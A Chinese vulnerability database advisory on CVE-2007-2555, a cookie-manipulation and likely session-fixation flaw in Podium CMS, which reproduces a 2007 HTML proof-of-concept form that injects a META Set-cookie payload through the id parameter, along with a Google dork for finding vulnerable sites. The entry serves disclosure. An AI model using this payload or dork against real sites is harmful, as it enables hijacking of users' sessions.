Podium CMS META HTTP-EQUIV Set-cookie 未明会话劫持漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190646 漏洞类型 授权问题
发布时间 2007-05-09 更新时间 2007-05-09
CVE编号 CVE-2007-2555 CNNVD-ID CNNVD-200705-176
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81797
https://cxsecurity.com/issue/WLB-2007050018
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-176
|漏洞详情
PodiumCMS的Default.aspx中存在未明漏洞。远程攻击者可以借助id参数中的METAHTTP-EQUIVSet-cookie表述,造成未知影响,可能是会话固定。
|漏洞EXP
<!--

Podium CMS - Cookie Manipulation Exploit

Vulnerable: All Versions
Google d0rk: inurl:"podium/Default.aspx"

John Martinelli
john (at) martinelli (dot) com [email concealed]
http://john-martinelli.com

May 5th, 2007

!-->

<html>
<head><title>Podium CMS - Cookie Manipulation Exploit</title><body>

<center><br><br><font size=4>Podium CMS - Cookie Manipulation Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&safe=off&q=inurl%3A%22podium%2F
Default.aspx">inurl:"podium/Default.aspx"</a></font><br>

<br><br>
<form action="http://target.com/podium/Default.aspx" method="post">
<input name="id" size=75 value="<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>">

<input type=submit value="Execute Cookie Manipuation" class="button">
</form>

</body></html>
|受影响的产品
Podium Cms Podium Cms 0
|参考资料

来源:BUGTRAQ
名称:20070509Re:PodiumCMS-CookieManipulationExploit
链接:http://www.securityfocus.com/archive/1/archive/1/468058/100/0/threaded
来源:BUGTRAQ
名称:20070505PodiumCMS-CookieManipulationExploit
链接:http://www.securityfocus.com/archive/1/archive/1/467823/100/0/threaded
来源:SREASON
名称:2664
链接:http://securityreason.com/securityalert/2664
来源:OSVDB
名称:36182
链接:http://osvdb.org/36182